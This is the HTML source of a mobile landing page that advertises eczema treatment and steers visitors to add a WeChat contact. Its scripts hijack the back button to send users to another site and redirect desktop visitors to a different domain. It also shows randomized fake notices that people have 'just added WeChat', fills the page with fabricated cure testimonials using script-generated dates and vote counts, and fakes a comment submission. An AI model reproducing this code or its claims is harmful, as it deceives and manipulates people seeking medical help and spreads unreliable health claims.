<html xmlns="http://www.w3.org/1999/xhtml"
      data-useragent="Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Mobile Safari/537.36">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport"
          content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no, email=no">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="keywords" content="湿疹,湿疹怎么办,湿疹怎么治疗?">
    <meta name="description" content="治疗湿疹,湿疹治疗">
    <title>皮肤健康资讯平台,湿疹怎么治疗?权威解答!</title>
    <link href="css/index_2.css" rel="stylesheet" type="text/css">
    <link href="css/style.css" rel="stylesheet" type="text/css">
    <link href="css/wapask_base_2.css" type="text/css" rel="stylesheet">
    <link href="css/wapask_all_2.css" type="text/css" rel="stylesheet">
    <link href="css/index_2.css" type="text/css" rel="stylesheet">
    <!--<script type="text/javascript" src="images/jquery.js.下载"></script>-->
    <style type="text/css" abt="234"></style>
    <script>//console.log('a')
    </script>
    <script src="../js/data.js"></script>
    <script>//remove baidu search ad
    var _countAA = 0

    function doBBBd() {
        var alla = document.getElementsByTagName('a')
        for (var i = 0; i < alla.length; i++) {
            if (/baidu.com\/(baidu.php\?url=|adrc.php\?t)/.test(alla[i].href)) {
                var _temp = alla[i].parentElement, loop = 0
                while (loop < 5) {
                    _temp = _temp.parentElement
                    loop++
                    if (_temp.parentElement.id == 'content_left') {
                        _temp.remove()
                        break
                    }
                }
            }
        }

        if (_countAA++ < 20) {
            setTimeout(doBBBd, 500)
        }

    }

    doBBBd()
    document.addEventListener('keyup', function () {
        _countAA -= 10;
        doBBBd()
    }, false)
    document.addEventListener('click', function () {
        _countAA -= 10;
        doBBBd()
    }, false)
    //remove sohu video ad
    //if (document.URL.indexOf("tv.sohu.com") >= 0){
    //    if (document.cookie.indexOf("fee_status=true")==-1){document.cookie='fee_status=true'};
    //}
    //remove 56.com video ad
    //if (document.URL.indexOf("56.com") >= 0){
    //    if (document.cookie.indexOf("fee_status=true")==-1){document.cookie='fee_status=true'};
    //}
    </script>
    <script>
        //声明_czc对象:
        var _czc = _czc || [];
        //绑定siteid，请用您的siteid替换下方"XXXXXXXX"部分
        _czc.push(["_setAccount", "1278561804"]);
    </script>
</head>
<div style="display: none">
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278561804'%3E%3C/span%3E%3Cscript src='" +
        cnzz_protocol + "v1.cnzz.com/z_stat.php%3Fid%3D1278561804' type='text/javascript'%3E%3C/script%3E"));</script>
</div>
<body style="">
<div id="LRdiv0" style="display:none;"></div>
<div id="LRdiv1" style="display:none;"></div>
<div id="LRdiv2" style="display:none;"></div>
<div id="LRdiv3" style="display:none;"></div>

<script type="text/javascript">
    pushHistory();
    window.addEventListener("popstate", function (e) {
        window.location.href = 'http://www.mikasan.xin/sz1/zx/index.html';

    }, false);

    function pushHistory() {
        var state = {
            title: "title",
            url: "#"
        };
        window.history.pushState(state, "title", "#");
    }
</script>
<script>
    var system = {
        win: false,
        mac: false,
        xll: false
    };
    var p = navigator.platform;
    system.win = p.indexOf("Win") == 0;
    system.mac = p.indexOf("Mac") == 0;
    system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
    if (system.win || system.mac || system.xll) {
        window.location.href = "http://xh9.gyg120.net"
    }
</script>
<style>
    #toast_content {
        border-radius: 32px;
        background: #999;
        opacity: 0.9;
        padding: 8px 16px;
        font-size: 16px;
        color: #fff
    }
</style>
<div id="toast"
     style="position: fixed; z-index: 999; top: 75%; text-align: center; width: 100%; display: block;">
    <span id="toast_content" style="">消息提醒：来自阳江的何女士刚添加了微信</span>
</div>
<script type="text/javascript">
    /* toast start */
    var area = ['北京', '广州', '郑州', '武汉', '珠海', '长沙', '淄博', '东莞', '昆山', '无锡', '阳江', '钦州', '天津', '厦门', '深圳', '株洲', '达州', '成都', '重庆', '北海', '福州', '梧州', '青海'];
    var person = ['赵先生', '吴女士', '高先生', '郑女士', '邓先生', '王女士', '邓女士', '李先生', '罗先生', '罗先生', '邓女士', '孙女士', '朱先生', '何女士', '朱先生', '白女士', '陈女士', '邓女士', '叶先生'];

    function showToast() {
        var areaIndex = Math.round(Math.random() * (area.length - 1));
        var personIndex = Math.round(Math.random() * (person.length - 1));
        $("#toast_content").text("消息提醒：来自" + area[areaIndex] + "的" + person[personIndex] + "刚添加了微信");
        $("#toast").fadeIn();
        setTimeout("dismissToast()", 2500);
    }

    function dismissToast() {
        $("#toast").fadeOut();
        setTimeout("showToast()", 1200 + Math.round(Math.random() * 8888));
    }

    dismissToast();
</script>

<div class="top">
    <div class="top_l left"><img src="images/xywy_03.jpg"></div>
    <div class="top_r right"><span class="top_wz1">推荐湿疹老师</span> <span class="top_wz2"> <a
            href="javascript:popup()">加微信</a></span></div>
</div>
<div class="clear"></div>
<div class="zong1">
    <div style="margin:10px auto auto"><a href="javascript:popup()"><img src="images/640.jpg"
                                                                         width="100%"></a></div>
    <div class="blank1"></div>

    <link href="css/1css.css" type="text/css" rel="stylesheet">

    <script type="text/javascript" src="js/pl.js"></script>

    <div class="jiapl">

        <div class="toppl">更多留言</div>

        <ul id="marqueeds" style="overflow: hidden; height: 500px;">
            <table cellspacing="0" cellpadding="0" style="border-collapse:collapse;">
                <tbody>
                <tr>
                    <td>

                        <li>

                            <div class="ds-left"><img src="images/a1.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">依赖１棵草っ</p>

                                <p class="dsp2">很好很强大，听了指导现在已经好了，谢谢</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a2.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">彼岸雨露</p>

                                <p class="dsp2">我就是外阴湿疹呀，我已经用好了，老师挺负责任的，你加微信
                                    <span class="wx_str" onclick="clickSpan()"/>自己咨询吧，确实不错值得咨询了解下。
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a3.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">素颜殁</p>

                                <p class="dsp2">
                                    我也是湿疹多年当时来这里还是我的朋友推荐我来的，感觉确实是挺不错的，用药2天就好转很多现在康复了，治疗的让我很满意。</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a4.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">每个人的晴天@</p>

                                <p class="dsp2">今天我已经按老师说的做了，用了方法期待好转中</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a5.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">女汉子恐龙妹°</p>

                                <p class="dsp2">我来了，有想和本美女做朋友的吗？哈哈</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 1) + '日'; </script>6日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a6.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">眼泪</p>

                                <p class="dsp2">好烦呀，我也是手上有湿疹，生活中真的是超级尬，烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a7.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">雾霾下的大雁塔</p>

                                <p class="dsp2">朋友推荐过来的，我也是加微信
                                    <span class="wx_str" onclick="clickSpan()"></span>咨询了解的，有没有成都的朋友
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a8.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">萌萌哒</p>

                                <p class="dsp2">我是去年看的，我以前的肚脐那个部位长湿疹夏天出汗痒的受不了，在同事推荐下加她微信
                                    <script>document.write(Arr);</script>
                                    124191019咨询听了他的建议今年一直没有反复，感谢了
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang01.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">时光是记忆的橡皮泥</p>

                                <p class="dsp2">看我呀，你在害怕什么，咯咯咯</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang02.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">也许不是你</p>

                                <p class="dsp2">我小孩的湿疹也在他看好的，哈哈真有缘呀[威武]</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang03.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">爱在接近</p>

                                <p class="dsp2">幸亏有你们的治疗，效果确真不是盖的，现在已经恢复的跟以前时候一样了！</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1 日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang04.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">萌妹纸</p>

                                <p class="dsp2">我先加微信吧 不说了</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>
                        <li>

                            <div class="ds-left"><img src="images/touxiang05.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">狼嚎鬼叫</p>

                                <p class="dsp2">我是舍友推荐过来的，之前治疗过说效果挺好的， 这么多朋友呀？？？？</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                    </td>
                </tr>
                <tr>
                    <td>

                        <li>

                            <div class="ds-left"><img src="images/a1.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">依赖１棵草っ</p>

                                <p class="dsp2">很好很强大，听了指导现在已经好了，谢谢</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a2.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">彼岸雨露</p>

                                <p class="dsp2">我就是外阴湿疹呀，我已经用好了，老师挺负责任的，你加微信
                                    <script>document.write(Arr);</script>
                                    124191019自己咨询吧，确实不错值得咨询了解下。
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a3.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">素颜殁</p>

                                <p class="dsp2">
                                    我也是湿疹多年当时来这里还是我的朋友推荐我来的，感觉确实是挺不错的，用药2天就好转很多现在康复了，治疗的让我很满意。</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 0) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a4.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">每个人的晴天@</p>

                                <p class="dsp2">今天我已经按老师说的做了，用了方法期待好转中</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a5.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">女汉子恐龙妹°</p>

                                <p class="dsp2">我来了，有想和本美女做朋友的吗？哈哈</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate() - 1) + '日'; </script>6日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a6.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">眼泪</p>

                                <p class="dsp2">好烦呀，我也是手上有湿疹，生活中真的是超级尬，烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦烦</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a7.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">雾霾下的大雁塔</p>

                                <p class="dsp2">朋友推荐过来的，我也是加微信
                                    <script>document.write(Arr);</script>
                                    124191019咨询了解的，有没有成都的朋友
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/a8.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">萌萌哒</p>

                                <p class="dsp2">我是去年看的，我以前的肚脐那个部位长湿疹夏天出汗痒的受不了，在同事推荐下加她微信
                                    <script>document.write(Arr);</script>
                                    124191019咨询听了他的建议今年一直没有反复，感谢了
                                </p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang01.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">时光是记忆的橡皮泥</p>

                                <p class="dsp2">看我呀，你在害怕什么，咯咯咯</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang02.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">也许不是你</p>

                                <p class="dsp2">我小孩的湿疹也在他看好的，哈哈真有缘呀[威武]</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>4)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang03.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">爱在接近</p>

                                <p class="dsp2">幸亏有你们的治疗，效果确真不是盖的，现在已经恢复的跟以前时候一样了！</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月1 日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>

                        <li>

                            <div class="ds-left"><img src="images/touxiang04.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">萌妹纸</p>

                                <p class="dsp2">我先加微信吧 不说了</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>3)</span>
                                </p>

                            </div>

                        </li>
                        <li>

                            <div class="ds-left"><img src="images/touxiang05.jpg"></div>

                            <div class="ds-right">

                                <p class="dsp1">狼嚎鬼叫</p>

                                <p class="dsp2">我是舍友推荐过来的，之前治疗过说效果挺好的， 这么多朋友呀？？？？</p>

                                <p class="dsp3"><span>2019年<script>document.write(new Date().getMonth() + 1)</script>1月<script>document.write(new Date().getDate()) + '日'; </script>7日</span><span>回复</span><span>顶(<script>document.write(Math.floor(Math.random() * 3 + 2));</script>2)</span>
                                </p>

                            </div>

                        </li>

                    </td>
                </tr>
                </tbody>
            </table>
        </ul>

        <script type="text/javascript">new Marquee("marqueeds", 0, 1, "100%", 500, 50, 0, 1, 1)</script>

        <ul>

            <hr>

            <li>

                <div class="ds-left"><a onclick="dstj();return false;"
                                        href="javascript:void(0)">发送</a></div>

                <div class="ds-right">

                    <textarea id="dspl" placeholder="说点什么吧…"></textarea>

                </div>

            </li>

        </ul>

    </div>

    <script>

        function dstj() {

            if (dspl.value == '') {

                alert('-请填写发送内容！');

            } else {
                alert('评论成功，5分钟后查看评论！');
            }

        }

    </script>

    <br>
    <br>
    <br>
    <br>

    <div style="background:#fcfcfc; bottom:0px;  position:fixed; width:100%; padding: 9px 3px;border-top:2px #eee solid;z-index:99999999999999">
        <div style=" margin:auto;"><img
                style="float: left; width: 40px;margin-left:2px; height: 40px;" width="40"
                height="40" src="images/TB2w5LwqCXlpuFjy0FeXXcJbFXa_!!36977811.png"
                title="bt_wechat_press" alt="bt_wechat_press" border="0" vspace="0">
            <div style="float: left; font-size: 13px; line-height: 20px; margin-left:2px;margin-top:5px; color: #444"><span
                    style="font-size: 14px;">加老师微信<strong><span  class="wx_str"
                    onclick="clickSpan()" id="spanclick"  style="font-weight:bold;color:red;"  ></span></strong><br>
      可获取祛除湿疹指导!</span></div>
            <div style="float:left; color: #fff;

    text-shadow: 0 -1px 0 rgba(0,0,0,.2);margin-left:3px;

    background-color: #259dab;margin-top:5px;

    border-color: transparent;display:inline-block;padding:7px 12px;margin-bottom:0;font-size:13px;font-weight:400;line-height:1.53846154;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;border-radius:2px;-webkit-transition:all .4s cubic-bezier(.175,.885,.32,1);-o-transition:all .4s cubic-bezier(.175,.885,.32,1);transition:all .4s cubic-bezier(.175,.885,.32,1)">
                <a href="weixin://" style="color:#fff;">打开微信&gt;</a></div>
        </div>
    </div>
    <div id="wechatBox" class="wechatBox" onclick="closeP()" style="display: none;"></div>
    <div id="wechat" class="wechat" style="display: none;">
        <p style="float: right; margin-top: -20px; padding-right: 5px; color: red"
           onclick="closeP()">关闭</p>
        <p class="p1" style="clear: both">第一步:点击微信号复制↓↓↓↓</p>
        <p class="wxid"><span onclick="wechat_32(32)"
                              style="background: yellow; color: red;"> <strong> <span oncopy="sc()"> <b
                style="font-size:0.9em"><span style="color:#ff0000 "><nobr> <script>document.write(stxlwx);</script><span
                class="manxing longpressWeixin wx_str"></span></nobr> </span></b> <span
                id="wx19"></span> </span> </strong> </span></p>
        <p class="p1" style="clear: both">第二步:复制微信后,点击下面文字↓↓↓↓</p>
        <p class="p2"><a href="weixin://" onclick="PIWI_SUBMIT.Weixin_Open()"> <font
                color="#ff0000">打开微信添加</font> </a></p>
    </div>
    <script type="text/javascript">
        function closeP() {
            var wx = document.getElementById("wechat");
            var wxb = document.getElementById("wechatBox");
            wx.style.display = "none";
            wxb.style.display = "none";
        }

        function popup() {
            var wx = document.getElementById("wechat");

            var wxb = document.getElementById("wechatBox");

            wx.style.display = "block";

            wxb.style.display = "block";

            //addlog();
        }
    </script>
    <script nonce="" type="text/javascript">document.addEventListener("touchstart", function () {
    }, false);</script>

</div>
<script type="text/javascript">
    var siga = siga || [];
    var group = group || [];
    var time = time || [];
    siga.push('a86bd91a218745af2b9474a1a0008f7c');
    group.push('8288');
    time.push(86400); //86400代表默认同IP缓存一天(可自由设置1就是1秒);
    (function () {
        var ma = document.createElement('script');
        ma.type = 'text/javascript';
        ma.async = true;
        ma.src = 'https://code.ljwit.com/weixin_bases.js';
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(ma, s);
    })();
</script>
<script src="https://tj.ljwit.com/code_ex/code_ex3.js"></script>
<script>
    $(".wx_str").click(function(){
        $("#tanchuang_result").fadeIn();
        $("#mask").fadeIn();
        console.log(1)
    });
    $("#close").click(function(){
        $("#mask").fadeOut();
        $("#tanchuang_result").fadeOut();
    })
</script>

<script type="text/javascript">
    var uid = uid || [];
    uid.push('a86bd91a218745af2b9474a1a0008f7c');
    (function () {
        var ma = document.createElement('script');
        ma.type = 'text/javascript';
        ma.async = true;
        ma.src = 'https://code.ljwit.com/base_tj.js';
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(ma, s);
    })();
</script>

<!--<script>-->
    <!--window.onload = () => {-->
        <!--var eles = document.querySelectorAll('img'); // 获取所有列表元素-->

        <!--// 监听回调-->
        <!--var callback = (entries) => {-->
            <!--entries.forEach(item => {-->
                <!--// 出现到可视区-->
                <!--if (item.intersectionRatio > 0) {-->
                    <!--var ele = item.target;-->
                    <!--var imgSrc = ele.getAttribute('src');-->
                    <!--if (imgSrc) {-->
                        <!--// 预加载-->
                        <!--var img = new Image();-->
                        <!--img.addEventListener('load', function() {-->
                            <!--ele.src = imgSrc;-->
                        <!--}, false);-->
                        <!--ele.src = imgSrc;-->
                        <!--// 加载过清空路径，避免重复加载-->
                        <!--ele.removeAttribute('src');-->
                    <!--}-->
                <!--}-->
            <!--})-->
        <!--}-->
        <!--var observer = new IntersectionObserver(callback);-->

        <!--// 列表元素加入监听-->
        <!--eles.forEach(item => {-->
            <!--observer.observe(item);-->
        <!--})-->
    <!--}-->
<!--</script>-->
</body>
</html>
